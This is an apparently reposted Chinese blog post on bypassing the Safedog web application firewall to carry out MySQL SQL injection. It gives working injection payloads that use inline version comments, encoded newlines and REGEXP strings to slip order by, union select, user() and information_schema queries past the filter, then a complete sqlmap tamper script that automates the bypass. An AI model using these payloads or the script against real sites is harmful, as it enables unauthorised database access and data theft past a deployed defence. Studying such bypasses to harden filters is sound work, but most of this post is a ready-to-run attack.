聲明：該文章來(lái)自（先知社區(qū)）版權(quán)由原作者所有，K2OS渲染引擎提供網(wǎng)頁(yè)加速服務(wù)。

0x00：前言

安全狗又偷偷摸摸更新了

0x01：繞過(guò)

之前安全狗就像沒(méi)開(kāi)發(fā)完一樣，簡(jiǎn)單內(nèi)聯(lián)就過(guò)去了，但是現(xiàn)在的安全狗搖身一變，變得穩(wěn)重了起來(lái)。

就連報(bào)錯(cuò)界面都變成了大人的模樣。

看這架勢(shì)，不好過(guò)啊

首先 and 內(nèi)斂注釋依舊是可以過(guò)的，看來(lái)安全狗并沒(méi)有太過(guò)關(guān)注and，可能是覺(jué)得后面的規(guī)則比較牛，知道有注入也沒(méi)用？

然后是order by ，從這里開(kāi)始，事情就變得微妙了起來(lái)

猜測(cè)規(guī)則是order by 組合強(qiáng)規(guī)則，意思就是order by中間無(wú)論加什么都過(guò)不去

隨便試一試

果然，但是有沒(méi)有發(fā)現(xiàn)，我fuzz的符號(hào)里沒(méi)有加＃號(hào)，因?yàn)榧恿司蜁?huì)這樣

由于錨點(diǎn)這個(gè)特殊性，盲猜這是一個(gè)突破點(diǎn)

可能安全狗遇到注釋也會(huì)直接截?cái)嗟艉竺娴恼Z(yǔ)句（類似某鎖），那就好說(shuō)了，構(gòu)造個(gè)注釋在語(yǔ)句前面即可

居然沒(méi)過(guò)，小看你了安全狗，看來(lái)order by規(guī)則還沒(méi)失效，那么 嘗試隔斷order by

中間加個(gè)%0a

輕輕松松

接下來(lái)是union select 組合

同理，也可以這樣過(guò)

1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,2,3 --+

下一個(gè)是user()這類函數(shù)，這里也是個(gè)坑，發(fā)現(xiàn)直接括號(hào)會(huì)被攔

去一個(gè)右括號(hào)就沒(méi)事了，這規(guī)則也是無(wú)語(yǔ)

既然如此，在括號(hào)里下文章即可

依然是換行加注釋繞過(guò)

-1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +

然后是INFORMATION_SCHEMA 這玩意，居然也被加到了規(guī)則里，

沒(méi)關(guān)系，繼續(xù)構(gòu)造換行注釋，

-1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,(select %0a group_concat(schema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +

0x02：tamper

#!/usr/bin/env python
# -*- coding: utf-8 -*-



"""
Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26)
See the file 'LICENSE' for copying permission
Author:pureqh.top
"""

import re
import os

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

        payload=payload.replace(" ","  ",1)
        payload=payload.replace("ORDER BY","REGEXP \"[...%25%23]\"   /*!11444order %0a by*/")
        payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")
        payload=payload.replace(" AND","/*!11444AND*/")
        payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")
        payload=payload.replace("UNION SELECT","/*!11444union*/  /*REGEXP \"[...%25%23]\"*/  %0a select /*REGEXP \"[...%25%23]\"*/")
        payload=payload.replace("UNION ALL SELECT","REGEXP \"[...%0a%23]\" /*!11444union %0a select */ ")
        payload=payload.replace("()","(%0a /*!80000aaa*/)")
        payload=payload.replace(" AS","/*!11444AS*/")
        payload=payload.replace("FROM","/*!11444FROM*/")
        payload=payload.replace("INFORMATION_SCHEMA","/*like\"%0a%23\"*/ %0a  INFORMATION_SCHEMA")
        payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")

        return payload

題外話 某鎖也能這樣過(guò)

代碼已更新至github

https://github.com/pureqh/bypasswaf

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級(jí)服務(wù)市場(chǎng)：https://www.ijiandao.com/